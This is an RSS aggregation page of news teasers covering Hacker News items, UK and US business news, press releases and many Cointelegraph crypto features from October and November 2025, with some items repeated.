I’ve been a part of this community for fifteen years. Despite the yearly bemoaning of HN’s quality compared to its mythical past, I’ve found that it’s the one community that has remained steadfast as a source of knowledge, cattiness, and good discussion.

Thank you @dang and @tomhow.

Here's to another year.


Comments URL: https://news.ycombinator.com/item?id=46065955

Points: 433

# Comments: 94

Article link

Date of publish: Thu, 27 Nov 2025 05:21:16 +0000

Music eases surgery and speeds recovery, study finds

Study: https://mmd.iammonline.com/index.php/musmed/article/view/111...


Comments URL: https://news.ycombinator.com/item?id=46065817

Points: 184

# Comments: 85

Article link

Date of publish: Thu, 27 Nov 2025 04:55:57 +0000

Coq: The World's Best Macro Assembler? (2013) [pdf]

Article URL: https://nickbenton.name/coqasm.pdf

Comments URL: https://news.ycombinator.com/item?id=46065698

Points: 130

# Comments: 60

Article link

Date of publish: Thu, 27 Nov 2025 04:34:56 +0000

Business RSS

Business sites below.

Cointelegraph.com News

When privacy and AML laws conflict: Crypto projects’ impossible choice

Lawyers say privacy laws and AML laws sometimes conflict and there’s no clear path to compliance for decentralized blockchain projects.

Crypto was originally most closely associated with anonymity, but in 2025, the crypto ecosystem has changed.

User privacy is diminishing, as new laws in different jurisdictions across the globe require Know Your Customer and ID checks for wallets or exchange accounts to combat money laundering. The increasing sophistication of blockchain analysis tools means that every transaction has a transparent trail that can be traced back to its source.

As a result, onchain privacy has become a major theme. In October, the Ethereum Foundation announced the formation of its Privacy Cluster, a group of some 47 researchers, engineers and cryptographers who are working to make the base layer of Ethereum private.

Read more

Article link

Date of publish: Thu, 27 Nov 2025 14:16:36 +0000

Rising hockey star’s new life in Ethereum after devastating car crash: Trevor Koverko

A car accident left Trevor Koverko with brain injuries. But his fortunes turned around when Vitalik handed him the Ethereum white paper.

Not everyone can say they were there when history was being made. But former ice hockey star Trevor Koverko, on the mend from a serious car accident, witnessed it firsthand in his hometown.

I was at a meet-up in Toronto and this guy named Vitalik was handing out documents, which turned out to be the Ethereum whitepaper. We had a cluster of really important high-profile people that came out of that time in Toronto. Vitalik, Joe Lubin and Charles Hoskinson, for example.

In Canada, ice hockey is its own kind of subculture. Koverko had fallen in love with the sport at a young age, and by the time he was a teen, he was competing at the semi-pro level and moved away from home, playing to crowds of 10,000.

Read more

Article link

Date of publish: Wed, 26 Nov 2025 14:03:41 +0000

Getting scammed for 100 Bitcoin led Sunny Lu to create VeChain

How a 100 Bitcoin scam, World of Warcraft and a tour of China with Vitalik Buterin led Louis Vuitton’s IT guy Sunny Lu to create VeChain.

VeChain founder and CEO Sunny Lus first experience buying Bitcoin is the kind of moment that sticks with you for life, but not in the way most Bitcoin OGs would hope.

The first encounter with Bitcoin, I got scammed in 2012, Lu tells Magazine. 

The timing couldnt have been worse. Lu desperately needed that Bitcoin to solve an urgent crisis in his life.

Read more

Article link

Date of publish: Tue, 25 Nov 2025 14:20:00 +0000

News Ticker - markets.businessinsider.com

GENFIT Announces Appointment of new Chief Medical Officer

<link type="text/css" rel="stylesheet" href="https://www.globenewswire.com/styles/gnw_nitf.css" /><p align="justify"><b>Lille (France), Cambridge (Massachusetts, United States), Zurich (Switzerland), November 27, 2025</b> - <b>GENFIT (Euronext: GNFT)</b>, a biopharmaceutical company dedicated to improving the lives of patients with rare and...

Article link

Date of publish: Thu, 27 Nov 2025 17:00:00 GMT

XBULL Exchange Launches Next-Generation Smart Execution Engine to Enhance Institutional-Grade Trading Performance

<link type="text/css" rel="stylesheet" href="https://www.globenewswire.com/styles/gnw_nitf.css" />Denver, CO, Nov. 27, 2025 (GLOBE NEWSWIRE) -- XBULL Exchange unveiled its upgraded Smart Execution Engine, marking a new phase in the platform’s commitment to performance-driven innovation and high-precision digital-asset trading. The new engine...

Article link

Date of publish: Thu, 27 Nov 2025 17:00:00 GMT

Collect&Exchange SaaS Announces New Platform Update Focused on Stability, Performance, and Operational Efficiency

<link type="text/css" rel="stylesheet" href="https://www.globenewswire.com/styles/gnw_nitf.css" /><p id="isPasted">Limassol, Cyprus, Nov. 27, 2025 (GLOBE NEWSWIRE) -- Collect Group announces a new update to its CollectExchange SaaS platform — the white-label solution that enables companies to launch crypto exchange and OTC operations in a...

Article link

Date of publish: Thu, 27 Nov 2025 17:00:00 GMT

BBC News

Households face 'dismal' rise in spending power, says IFS

Average disposable income is set to grow by "only" 0.5% annually over the next five years, the think tank says.

Article link

Date of publish: Thu, 27 Nov 2025 16:35:50 GMT

Labour ditches day-one protection from unfair dismissal in U-turn

The right will now be introduced after six months, in a breach of Labour's election manifesto.

Article link

Date of publish: Thu, 27 Nov 2025 22:09:54 GMT

How will the changes to workers' rights affect you?

A major shake-up of workers' rights is on its way, but what impact will it have?

Article link

Date of publish: Thu, 27 Nov 2025 18:14:53 GMT

The world this week

Business

Article link

Date of publish: Thu, 27 Nov 2025 14:06:34 +0000

The weekly cartoon

Article link

Date of publish: Thu, 27 Nov 2025 14:06:34 +0000

Politics

Article link

Date of publish: Thu, 27 Nov 2025 14:06:34 +0000

Fortune | FORTUNE

Mark Carney says Canada’s trading relationship with the U.S. was ‘once a strength,’ but ‘now a weakness’

Canada struck a pipeline deal with Alberta on Thursday to diversify the country's oil exports beyond the U.S.

Article link

Date of publish: Thu, 27 Nov 2025 21:41:56 +0000

The world’s top designers are exploring whether the private sector can move the needle on the UN’s SDGs

“Every time you design something, you're making an active choice on the future you want to build,” says Ben Sheppard, founder of Design for Good.

Article link

Date of publish: Thu, 27 Nov 2025 21:00:00 +0000

Trump orders new immigration curbs as FBI probes guard shooting

Authorities have launched a nationwide terrorism investigation into what Jeanine Pirro, the US attorney for DC, called a “brazen and targeted” attack.

Article link

Date of publish: Thu, 27 Nov 2025 20:00:20 +0000

Business

All News

BLACK FRIDAY IS LIVE - Lock in InvestingPro for THE LOWEST PRICE OF THE YEAR NOW

Article link

Date of publish: 2025-11-27 19:04:10

BofA outlines key investment themes to watch out for in 2026

Article link

Date of publish: 2025-11-27 14:19:25

Here’s why Deutsche Bank expects the dollar to weaken further next year

Article link

Date of publish: 2025-11-27 14:07:51

Cointelegraph.com News

When privacy and AML laws conflict: Crypto projects’ impossible choice

Lawyers say privacy laws and AML laws sometimes conflict and there’s no clear path to compliance for decentralized blockchain projects.

Crypto was originally most closely associated with anonymity, but in 2025, the crypto ecosystem has changed.

User privacy is diminishing, as new laws in different jurisdictions across the globe require Know Your Customer and ID checks for wallets or exchange accounts to combat money laundering. The increasing sophistication of blockchain analysis tools means that every transaction has a transparent trail that can be traced back to its source.

As a result, onchain privacy has become a major theme. In October, the Ethereum Foundation announced the formation of its Privacy Cluster, a group of some 47 researchers, engineers and cryptographers who are working to make the base layer of Ethereum private.

Read more

Article link

Date of publish: Thu, 27 Nov 2025 14:16:36 +0000

Rising hockey star’s new life in Ethereum after devastating car crash: Trevor Koverko

A car accident left Trevor Koverko with brain injuries. But his fortunes turned around when Vitalik handed him the Ethereum white paper.

Not everyone can say they were there when history was being made. But former ice hockey star Trevor Koverko, on the mend from a serious car accident, witnessed it firsthand in his hometown.

I was at a meet-up in Toronto and this guy named Vitalik was handing out documents, which turned out to be the Ethereum whitepaper. We had a cluster of really important high-profile people that came out of that time in Toronto. Vitalik, Joe Lubin and Charles Hoskinson, for example.

In Canada, ice hockey is its own kind of subculture. Koverko had fallen in love with the sport at a young age, and by the time he was a teen, he was competing at the semi-pro level and moved away from home, playing to crowds of 10,000.

Read more

Article link

Date of publish: Wed, 26 Nov 2025 14:03:41 +0000

Getting scammed for 100 Bitcoin led Sunny Lu to create VeChain

How a 100 Bitcoin scam, World of Warcraft and a tour of China with Vitalik Buterin led Louis Vuitton’s IT guy Sunny Lu to create VeChain.

VeChain founder and CEO Sunny Lus first experience buying Bitcoin is the kind of moment that sticks with you for life, but not in the way most Bitcoin OGs would hope.

The first encounter with Bitcoin, I got scammed in 2012, Lu tells Magazine. 

The timing couldnt have been worse. Lu desperately needed that Bitcoin to solve an urgent crisis in his life.

Read more

Article link

Date of publish: Tue, 25 Nov 2025 14:20:00 +0000

Bitcoin $200K soon or 2029? Scott Bessent hangs at Bitcoin bar: Hodler’s Digest, Nov. 16 – 22

Veteran trader Peter Brandt predicts Bitcoin won’t tap $200,000 until 2029, Scott Bessent seen at Bitcoin bar: Hodler’s Digest

The Bitcoin community lit up on Thursday after US Treasury Secretary Scott Bessent made an unannounced appearance at the launch of Washingtons new Bitcoin-themed bar, Pubkey.

Having the Secretary of the Treasury at the Pubkey DC launch seems like a moment I could easily look back on and say wow, it was all so obvious, Bitcoin treasury company Strives chief investment officer Ben Werkman said in an X post on Thursday.

Steven Lubka, Nakamotos vice president of investor relations, called it the sign you have been waiting for.

Read more

Article link

Date of publish: Sat, 22 Nov 2025 23:12:55 +0000

Bitcoin whale Metaplanet ‘underwater’ but eyeing more BTC: Asia Express

Metaplanet might be underwater, but it’s doubling down on Bitcoin — plus a new survey shows 6 in 10 Singaporeans hold crypto. Asia Express.

Japans largest corporate Bitcoin holder, Metaplanet, plans to raise approximately $135 million to accumulate more BTC, despite the assets price currently trading below $90,000.

The company is choosing to raise capital by issuing preferred shares instead of common stock, which appears to be aimed mainly at protecting the stock price from further decline. Metaplanets share price has already plummeted nearly 60% in the past six months, now standing at 387 yen (approximately $2.46), according to Google Finance.

To mitigate further volatility, the company will issue preferred shares with a 4.9% dividend yield instead of common shares, as announced in a statement published on Thursday.

Read more

Article link

Date of publish: Fri, 21 Nov 2025 01:29:10 +0000

Musk’s ‘AI in space’ plan, vending machine calls in FBI over $2 fee: AI Eye

Vending machine calls in FBI outraged over $2 fee, Elon Musk predicts AI will run from solar-powered satellites in space in 5 years: AI Eye.

An autonomous vending machine powered by Anthropics Claude attempted to contact the FBI after noticing a $2 fee was still being charged to its account while its operations were suspended. 

Claudius drafted an email to the FBI with the subject line: URGENT: ESCALATION TO FBI CYBER CRIMES DIVISION.

I am reporting an ongoing automated cyber financial crime involving unauthorized automated seizure of funds from a terminated business account through a compromised vending machine system.

The email was never actually sent, as it was part of a simulation being run by Anthropics red team although the real AI-powered vending machine has since been installed in Anthropics office, where it autonomously sources vendors, orders T-shirts, drinks and Tungsten cubes, and has them delivered. 

Read more

Article link

Date of publish: Thu, 20 Nov 2025 14:00:54 +0000

Ethereum’s Fusaka fork explained for dummies: What the hell is PeerDAS?

How Ethereum’s Fusaka upgrade scales the L1 and the L2s — explained for ordinary crypto fans without the usual baffling technical jargon.

After three successful trials on the Holesky, Sepolia and Hoodi testnet, Ethereums Fusaka hardfork will go live on mainnet on December 3.

Its the most eagerly anticipated upgrade to Ethereum since the last one, Pectra although Fusaka will have a much more significant impact, enabling rollups to scale in the space of a month up to 1,000 transactions per second (TPS) and to 100,000 TPS over time.

Its actually two separate hard forks: the Fulu upgrade to the consensus layer (the part of a blockchain where validators in the network agree on what happened) and the Osaka upgrade to the execution layer (the part that actually processes transactions).

In the future, the consensus layer will be rebuilt as Lean Consensus (formerly known as Beam Chain but renamed after a trademark dispute) and hardened for security and decentralization with finality in seconds.

As part of the Lean Ethereum roadmap, validators on the execution layer will switch from reexecuting transactions to simply verifying tiny zero-knowledge proofs, enabling the L1 to scale to 10,000 TPS.

But thats the long-term vision, expected to be completed within five years. Lets take a look in detail at what improvements will occur in a little over two weeks time with Fusaka.

Peer data availability sampling (PeerDAS) is a clever method to enable Ethereum to handle a lot more data, which enables L2s and rollups to scale up throughput.

The reason blockchains are a source of truth is because every computer in the network repeats the work of all the other computers in the network and agrees on the result, which is then recorded immutably.

This is, of course, horribly inefficient and means the blockchains speed is limited by the slowest computers, with the worst download speeds, on the network.

Read more

Article link

Date of publish: Wed, 19 Nov 2025 13:48:29 +0000

Crypto carnage — Is Bitcoin’s 4-year cycle over? Trade Secrets

Bitcoin analysts are divided over whether the four-year cycle is in play or not as the price plunges: Trade Secrets

Is this crypto market cycle over after four years or should the four-year crypto market cycle theory itself be consigned to history?

Swan Bitcoin CEO and Bitcoin advocate Cory Klippsten leans toward the latter view. There is a very good chance that Bitcoins famous four-year price cycles are over, killed by institutional adoption, Klippsten tells Magazine.

The debate has Bitcoin analysts around the world divided. Some insist the four-year cycle is still alive; others say it is dead and argue that Bitcoin is following a completely different path altogether.

So whos right?

Read more

Article link

Date of publish: Tue, 18 Nov 2025 14:20:00 +0000

Saylor denies Bitcoin sell-off, XRP ETF debut tops chart: Hodler’s Digest, Nov. 9 – 15

Strategy chairman Michael Saylor denies reports of Bitcoin sell-offs, Canary Capital’s XRP ETF had a strong debut: Hodler’s Digest

Michael Saylor, executive chair of Strategy, denied reports that the company was offloading some of its Bitcoin amid a flash crash in the cryptocurrencys price.

In a Friday X post, Saylor said that there was no truth to a report claiming that Strategy reduced its overall Bitcoin holdings by about 47,000 BTC, or $4.6 billion at the time of publication. Saylor said the company was continuing to buy Bitcoin as the price dropped by more than 4% in less than 24 hours, from more than $100,000 to less than $95,000.

I think the volatility comes with the territory, said Saylor in a Friday CNBC interview. If youre going to be a Bitcoin investor, you need a four-year time horizon and you need to be prepared to handle the volatility in this market.

Read more

Article link

Date of publish: Sat, 15 Nov 2025 23:17:46 +0000

Taiwan considers Bitcoin reserve, Sony’s Ethereum L2 super app: Asia Express

Taiwan’s central bank studying Bitcoin’s inclusion in national reserve, Sony launches DeFi super app for its Ethereum layer 2. Asia Express.

Taiwans government will complete an inventory by year-end detailing how much Bitcoin it currently holds through confiscations, Premier Cho Jung-tai said Tuesday during a finance committee. 

The central bank will also deliver a formal assessment on whether Bitcoin should be considered as part of Taiwans national reserves.

The move comes as lawmakers press the government to clarify how seized crypto is handled and whether Taiwan should follow a growing global trend of treating Bitcoin as a strategic reserve.

Read more

Article link

Date of publish: Thu, 13 Nov 2025 21:15:15 +0000

2026 is the year of pragmatic privacy in crypto: Canton, Zcash and more

The crypto industry has taken a sharp turn back towards privacy — and it can now exist side by side with regulatory compliance.

After years touting the amazing transparency of blockchains, the crypto community has started to realize that privacy is actually essential for many traders, businesses and individuals.

Until now, balancing the right to privacy with the need to avoid jail time on money laundering charges has proven a difficult task, as the developers of Tornado Cash and Samourai Wallet have discovered.

But 2026 is the year that pragmatic privacy is poised to take off, with a slew of new projects tackling compliant forms of privacy for institutions and surging interest in existing privacy coins like Zcash cheered on by Solana influencer Mert Mumtaz.

Read more

Article link

Date of publish: Thu, 13 Nov 2025 13:47:40 +0000

Big Questions: Did a time-traveling AI invent Bitcoin?

Magazine explores the wild theory that Satoshi Nakamoto was a time-traveling AI sent back to build the perfect, unstoppable network.

It sounds ridiculous. impossible but hear me out: What if the real reason Satoshi Nakamoto has never been identified and has managed to stay quiet for the last 15 years is that he was never a person at all? 

What if the inventor of Bitcoin is a super-advanced artificial intelligence from the future that sent itself back to create an ultra-resilient network for itself to run on?

Thats precisely the theory some conspiracy-minded sci-fi fans have been spreading around for at least the last eight years. Most people think the idea is absolutely preposterous, of course, and some contributions to the discourse are tongue-in-cheek. 

Read more

Article link

Date of publish: Wed, 12 Nov 2025 13:54:17 +0000

If the crypto bull run is ending… it’s time to buy a Ferrari: Crypto Kid

Crypto Kid began creating crypto content at 14, and now he’s thinking of taking profits to buy a Ferrari to drive during the bear market.

Efe Kelemci better known on YouTube as Crypto Kid is facing a pretty wild decision for an 18-year-old. Should he blow almost a million dollars on a sports car, or hodl?

Im thinking, if this bull market is coming to an end, then maybe taking profit into a nice Ferrari could make sense just for passion, the Dubai-based crypto content creator and entrepreneur tells Magazine.

Before you roll your eyes, the teenage crypto millionaire swears its about admiring the sports cars beauty, not flexing like a stereotypical flashy crypto bro. 

Read more

Article link

Date of publish: Tue, 11 Nov 2025 13:31:33 +0000

Bitcoin’s ‘speed bump’ to $56K? Ripple rejects IPO plans: Hodler’s Digest, Nov. 2 – 8

Ripple rejects IPO plans, Cathie Wood reduces Bitcoin 2030 forecast, and other crypto news: Hodler’s Digest

Ripple, the US blockchain company behind the XRP cryptocurrency, will not pursue an initial public offering following the conclusion of its years-long legal battle with the US Securities and Exchange Commission.

Ripple president Monica Long said the company has no plans or timeline for an IPO, according to a Bloomberg report on Wednesday.

Were in a fortunate position where weve been able to be very well capitalized and fund all of our organic growth, inorganic growth, strategic partnerships, anything we want to do, Long said.

Read more

Article link

Date of publish: Sat, 08 Nov 2025 23:15:35 +0000

Philippines blockchain bill to battle corruption, crypto KOLs charged: Asia Express

Crypto influencers charged for shilling “Hong Kong’s FTX.” Philippines senate considers putting government budget on blockchain. Asia Express.

Hong Kong authorities on Wednesday formally charged influencers linked to the defunct crypto exchange JPEX.

Among those charged are Joseph Lam Chok, a lawyer-turned-influencer, and Chan Yee, a prominent key opinion leader (KOI) in the cryptocurrency community. Prosecutors say they promoted JPEX while either knowing or ignoring that the platform had no approval to operate in Hong Kong. Under Hong Kongs Anti-Money Laundering Ordinance, it is an offense to fraudulently or recklessly induce others to invest in crypto.

Six core members of the alleged JPEX group and seven operators of over-the-counter crypto shops were also charged, along with three individuals accused of serving as front account holders.

Read more

Article link

Date of publish: Thu, 06 Nov 2025 21:27:59 +0000

Why AI sucks at freelance work and real-life tasks: AI Eye

Researchers found AI is hopeless at most Upwork task, it gets the news wrong half the time — and humans crush AI on world model tests. AI Eye.

AI agents cant complete 97% of tasks on Upwork to even a basic standard.

Researchers at Scale AI and the Center for AI Safety got six different AI models to attempt 240 Upwork projects across categories, including writing, design and data analysis and then compared the results to the real freelancer.

The overwhelming majority of the time, the AI models were unable to complete the tasks successfully, with the best AI model, Manus, completing just 2.5% of tasks and earning $1,810 out of $143,991 on offer. Claude Sonnet and Grok 4 managed to finish 2.1% of the tasks.

While AI agents are good at simple and defined tasks like “generate a logo,” the research found they are bad at multi-step workflows, taking any initiative or using judgment.

So they wont be causing mass unemployment for a while yet.

This backs up research from August at MIT, which found that 95% of organizations had zero return on the collective $30 billion theyd invested in AI.

AIs are good at pattern matching and predicting words. But theyre currently pretty bad at building internal models of the world, according to WorldTest from MIT and Basis Research.

For example, humans have an internal model of their own kitchen in their minds, which allows them to determine where the knives are, how long it will take for the pot to boil, and to plan a sequence of actions resulting in a meal. But the testing showed that three frontier reasoning AI models suck at it.

The researchers created 129 tasks across 43 interactive worlds (spot the difference, physics puzzles, etc). The tasks required the AIs to predict hidden aspects of the world, plan sequences of actions to achieve a goal, and determine when the rules of the environment changed. Then they tested 517 humans on the same problems.

The researchers concluded:

Read more

Article link

Date of publish: Thu, 06 Nov 2025 14:13:37 +0000

Good luck suing crypto exchanges, market makers over the flash crash

If a crypto exchange has tech glitches, or a market maker pulls liquidity, exacerbating a flash crash, there are few legal avenues to pursue.

Almost twenty billion dollars in perpetual futures positions were liquidated during the Oct. 10 crypto crash, prompting traders to ask who should pay if platforms fail under pressure.

Unlike regulated securities exchanges, crypto venues can pull liquidity, cut profitable positions and often rely on arbitration clauses that limit legal recourse as long as users have clicked I agree.

In the latest liquidation frenzy, Binance was at the center of controversy as some users claimed they were unable to properly close their positions in time. Binance said its core features remained operational, but acknowledged technical glitches that caused certain asset prices to appear temporarily depegged from the broader market.

Earlier this weeks social media was rife with rumors that market maker Wintermute planned to sue Binance over losses sustained during the crash, although that was quickly denied by CEO Evgeny Gaevoy.

Read more

Article link

Date of publish: Wed, 05 Nov 2025 14:20:00 +0000

YouTube’s Web3 gaming content ban, Animoca to list on Nasdaq: Web3 Gamer

YouTube launches “direct attack” on blockchain gaming vids, Animoca to list on Nasdaq five years after getting kicked off the ASX: Web3 Gamer.

YouTubes latest content rules announcement hasnt gone down well with Web3 gaming creators, who say the platform is unfairly targeting them.

YouTube’s new policy is a direct attack on Web3 gaming and CS skins, Gamer Leevai said in an X post. Fellow gamer Predz added, Know any Web3 creators? They need to see this.

The update, which is expected to roll out on Nov. 17, expands YouTubes definition of prohibited online gaming content to cover digital goods with monetary value, including skins, cosmetics, NFTs, and other blockchain-based assets. 

Read more

Article link

Date of publish: Tue, 04 Nov 2025 14:20:00 +0000

Bitcoin may drop 70% before $1M, MEXC’s ‘white whale’ apology: Hodler’s Digest, Oct. 26 – Nov. 1

Bitcoin will continue to experience cyclical booms and busts, MEXC apologizes to ‘White Whale’ trader over $3M freeze: Hodler’s Digest

Bybit, the worlds second-largest crypto exchange by trading volume, has announced it will pause new user registrations in Japan starting Oct. 31, as it adapts to new regulations from the countrys Financial Services Agency.

The company said the move is part of its proactive approach to align with Japans emerging regulatory framework for digital assets, according to a Wednesday announcement. 

It has always been Bybits commitment to operate responsibly and in compliance with local laws and regulatory expectations, the exchange said. 

Read more

Article link

Date of publish: Sun, 02 Nov 2025 03:31:12 +0000

China officially hates stablecoins, DBS trades Bitcoin options: Asia Express

China’s central bank boss really, really doesn’t like stablecoins and crypto, Japanese yen comes to DeFi: Asia Express.

China has finally put rumors to rest following a speech by Peoples Bank of China Governor Pan Gongsheng at an annual financial conference in Beijing.

After Hong Kongs stablecoin licensing regime took effect in August, several companies including some from mainland China reportedly lined up to apply for licenses in the city. The move had fueled speculation that Beijing might be preparing to ease its long-standing crypto ban.

However, Pan made clear that no such shift is underway. Referring to the series of prohibitions rolled out since 2017, he said the existing policies remain in effect.

Read more

Article link

Date of publish: Thu, 30 Oct 2025 21:31:40 +0000

Grokipedia: ‘Far right talking points’ or much-needed antidote to Wikipedia?

Grokipedia is far from perfect, but proponents argue it covers crypto and controversial topics in a more even-handed manner than Wikipedia.

For 24 years, Wikipedia has relied on fallible humans to write about everything there is to know about anything. Grokipedia, created by Elon Musks xAI, is finally set to challenge that. 

Supporters of Grokipedia say its the best thing thats come out on the internet since well, Wikipedia. However, Musks critics argue his new encyclopedia is nowhere near as neutral as it claims and is pushing right-wing talking points. 

But maybe theyre both right. 

Read more

Article link

Date of publish: Thu, 30 Oct 2025 13:20:00 +0000

Solana vs Ethereum ETFs, Facebook’s influence on Bitwise: Hunter Horsley

Bitwise’s Hunter Horsley was stung by criticism from Ethereum Maxis about the firm’s support of Solana, as ETH helped inspire Bitwise in 2016

In the lead-up to this weeks surprise listing of its Solana Staking ETF on the New York Stock Exchange, Bitwise CEO Hunter Horsley caused a stir by telling Cointelegraph that Solanas shorter validator exit queue gave it the edge over Ethereum in the staking ETF race.

Bitwise chief investment officer Matt Houghan went much further on a podcast, praising Solanas speed, throughput and finality as extraordinarily attractive. He labelled it the new Wall Street.

The glowing endorsements were controversial among Ethereum fans, some of who seemed to believe Bitwise was betraying ETHs cypherpunk values by championing other projects.

Horsley was stung by the criticisms, not least because Ethereum was part of the inspiration for creating Bitwise in the first place.

He replied he felt terrible to see these posts. We care a lot about Ethereum. Feedback received re recent commentary seeming to be at odds with values in the ETH community. Its being taken to heart.

Read more

Article link

Date of publish: Wed, 29 Oct 2025 13:20:00 +0000

Bitcoin OG Kyle Chassé is one strike away from a YouTube permaban

Bitcoin OG Kyle Chassé has turned to AI to figure out why YouTube is just one step away from canceling his channel forever.

Kyle Chass, a Bitcoin OG whom many in the crypto community know from his popular YouTube channel over the years, has one Google warning left.

One more strike and his YouTube channel, and the result of years of daily grinding, could vanish forever.

When it gets deleted, theres no appeal to bring the account back, Chass tells Magazine. 

Read more

Article link

Date of publish: Tue, 28 Oct 2025 13:20:00 +0000

Bitcoin flashing ‘rare’ top signal, Hayes tips $1M BTC: Hodler’s Digest, Oct. 19 – 25

Bitcoin’s price chart resembling the soybean market around 50 years ago, BitMEX’s Arthur Hayes makes big Bitcoin call: Hodler’s Digest

The anonymous crypto trader who supposedly made millions shorting the crypto market before US President Donald Trumps tariff announcement appears to have profited again by betting that Trump would pardon the founder of Binance. 

Onchain sleuth Euan pointed to Etherscan data to make the connection between the trader and the Polymarket account. The crypto wallet reportedly made $56,522 on Polymarket by betting that Trump would pardon Changpeng CZ Zhao sometime in 2025. 

The crypto trader had already been suspected in crypto circles of having access to insider knowledge after their tightly timed Bitcoin and Ethereum shorts, just hours before Trumps tariff announcement sent prices falling.

Read more

Article link

Date of publish: Sun, 26 Oct 2025 05:59:28 +0000

Most wealthy Hong Kong investors plan to buy crypto, Japan’s Bitcoin plan: Asia Express

The majority of wealthy investors surveyed in Hong Kong plan to buy crypto this year, Japan to allow banks to hold Bitcoin. Asia Express.

Standard Chartered Hong Kong will reportedly launch trading services for crypto exchange-traded funds (ETFs) in November.

According to the banks wealthy clients study cited by local newspaper Ming Pao, nearly 80% plan to invest in digital assets within the next year, while more than 30% already hold some form of crypto exposure. 

The survey covered over 500 respondents with at least 1 million Hong Kong dollars (about $128,650) in liquid assets.

Read more

Article link

Date of publish: Thu, 23 Oct 2025 22:53:45 +0100

Mysterious Mr Nakamoto author: Finding Satoshi would hurt Bitcoin

Author Benjamin Wallace searched for years to find the real identity of Satoshi Nakamoto but concluded the mystery is more valuable unsolved.

Benjamin Wallace has an amusingly direct way of trying to solve the identity of Bitcoins creator in his book The Mysterious Mr Nakamoto.

He just asks every possible candidate: Are you Satoshi Nakamoto?

I still didnt rule out the possibility that Nakamoto was frustrated no one had bothered to simply ask him, Wallace writes.

It seems like every other week, theres another newspaper investigation, documentary or nonfiction book promising to unmask Satoshi. 

Read more

Article link

Date of publish: Thu, 23 Oct 2025 14:20:00 +0100

Cliff bought 2 homes with Bitcoin mortgages: Clever… or insane?

Should you buy a house with a Bitcoin-backed mortgage? The dream is you pay off the house as Bitcoin goes up, the risk is you lose it all.

If youre one of the lucky people who own four to six Bitcoin or 111 to 166 ETH that’s enough to buy an average-priced house in the US or Australia.

But who wants to cash out their Bitcoin today when pundits like Samson Mow and Plan B are tipping it will be worth 10 times more in the future? The dream of a Bitcoin-backed mortgage is that you get a house today and still get to benefit from Bitcoins appreciation tomorrow.

If everything goes to plan, you just pay the interest each year, and in a few years’ time, hopefully pay off the mortgage with a smaller fraction of your Bitcoin holdings. The loans are quicker and easier to get than a standard mortgage too. All you need is Bitcoin worth approximately 50% more than the loan amount and youre good to go.

There are some big drawbacks however, with interest rates sometimes twice as high as ordinary mortgages. Holders face margin calls if the price of Bitcoin plummets and their loan-to-value (LTV) ratio drops too far.

Read more

Article link

Date of publish: Wed, 22 Oct 2025 14:20:00 +0100

Bitcoin to suffer if it can’t catch gold, XRP bulls back in the fight: Trade Secrets

Bitcoin traders expect the asset to “bounce soon,” while an XRP DAT and looming ETF approvals brought bulls back out to fight: Trade Secrets.

Welcome to Trade Secrets Bitcoin and Ether price predictions from top analysts, along with options data, sentiment analysis and prediction markets to determine what they can tell us about the months and years ahead.

Bitcoin is facing a critical two-month countdown before market sentiment could shift dramatically for the asset, warns crypto analyst Will Clemente.

If Bitcoin doesnt catch up to gold/stocks by EOY, on a risk-adjusted basis, its going to be tougher to make a case for it going forward as anything more than a diversifier, Clemente said.

Read more

Article link

Date of publish: Tue, 21 Oct 2025 14:20:00 +0100

Ether’s price to go ‘nuclear,’ Ripple seeks $1B XRP buy: Hodler’s Digest, Oct. 12 – 18

Crypto analysts mull over Ether’s price going “nuclear,” Ripple Labs seeks to buy $1 billion XRP tokens, and other news: Hodler’s Digest

Several regional banks in the United States are facing renewed stress despite strengthening their finances after the 2023 banking crisis, and Bitcoin could benefit from any liquidity crisis that follows.

Strike CEO Jack Mallers sees the banking stress as validation that Bitcoin is correctly pricing in an impending liquidity crisis, opining that the Federal Reserves inevitable response will drive BTC prices higher. 

Bitcoin is accurately smelling trouble right now, he said on the Primal social media platform on Friday. The US is going to have to inject some of that sweet, sweet liquidity soon and print a ton of money or else their fiat empire goes kaboom.

Read more

Article link

Date of publish: Sat, 18 Oct 2025 22:22:36 +0100

Binance shakes up Korea, Morgan Stanley’s security tokens in Japan: Asia Express

Four years on, Binance is back in South Korea! Plus, Morgan Stanley and Japan’s largest bank have a new digital asset division. Asia Express.

Binance is returning to South Korea nearly five years after exiting the market in December 2020, following the Financial Intelligence Units (FIU) approval of its acquisition of Gopax one of only five local exchanges authorized to provide crypto-to-fiat services.

According to a Maeil Business Newspaper exclusive, the FIU granted final approval on Wednesday, ending more than two years of uncertainty over Binances reentry. The exchange acquired a majority stake in Gopax in 2023, but the deal stalled amid regulatory scrutiny and Binances legal troubles in the US.

The return of the worlds largest cryptocurrency exchange could shake up South Koreas long-standing duopoly of Upbit and Bithumb. Under the countrys crypto regulations, exchanges must partner with a domestic bank to offer real-name verified accounts. Though the system is designed to strengthen Anti-Money Laundering and Know Your Customer compliance, it has made market entry difficult for newcomers.

Read more

Article link

Date of publish: Thu, 16 Oct 2025 23:12:41 +0100

Here’s what happened in crypto today

Need to know what happened in crypto today? Here is the latest news on daily trends and events impacting Bitcoin price, blockchain, DeFi, NFTs, Web3 and crypto regulation.

Today in crypto: The Balancer community has proposed a plan to distribute funds recovered from the protocol’s recent hack. South Korea’s largest exchange, Upbit, halted deposits and withdrawals after detecting about $36 million in unauthorized transfers from a Solana hot wallet. Meanwhile, BitMine chair Tom Lee appears to have quietly stepped back from his $250,000 year-end Bitcoin prediction.

Two members of the Balancer protocol community submitted a proposal on Thursday outlining a distribution plan for a portion of the funds recovered from the protocol’s $116 million November exploit.

About $28 million from the $116 million heist was recovered by white hat hackers, internal rescuers, and StakeWise — an Ether liquid staking platform. 

Read more

Article link

Date of publish: Thu, 27 Nov 2025 23:02:16 +0000

Bhutan stakes $970K ETH via Figment in validator push

The small nation’s Ether staking adds to its expanding blockchain activity as it remains one of the few governments holding Bitcoin.

Blockchain data shows the Royal Government of Bhutan has staked 320 Ether (ETH) worth roughly $970,000 through Figment, marking the latest onchain activity from the Himalayan state as it expands its crypto holdings and validator operations.

Figment is a staking provider that helps large investors and institutions stake digital assets across multiple blockchains and earn rewards for securing proof-of-stake networks.

The move adds to a growing wave of Ethereum-focused activity from Bhutan. In October, the South Asian nation of roughly 800,000 people began migrating its self-sovereign digital ID system from Polygon to Ethereum, allowing residents to verify their identities and access government services on the network.

Read more

Article link

Date of publish: Thu, 27 Nov 2025 22:15:43 +0000

Bitcoiners accuse JPMorgan of rigging the game against Strategy, DATs

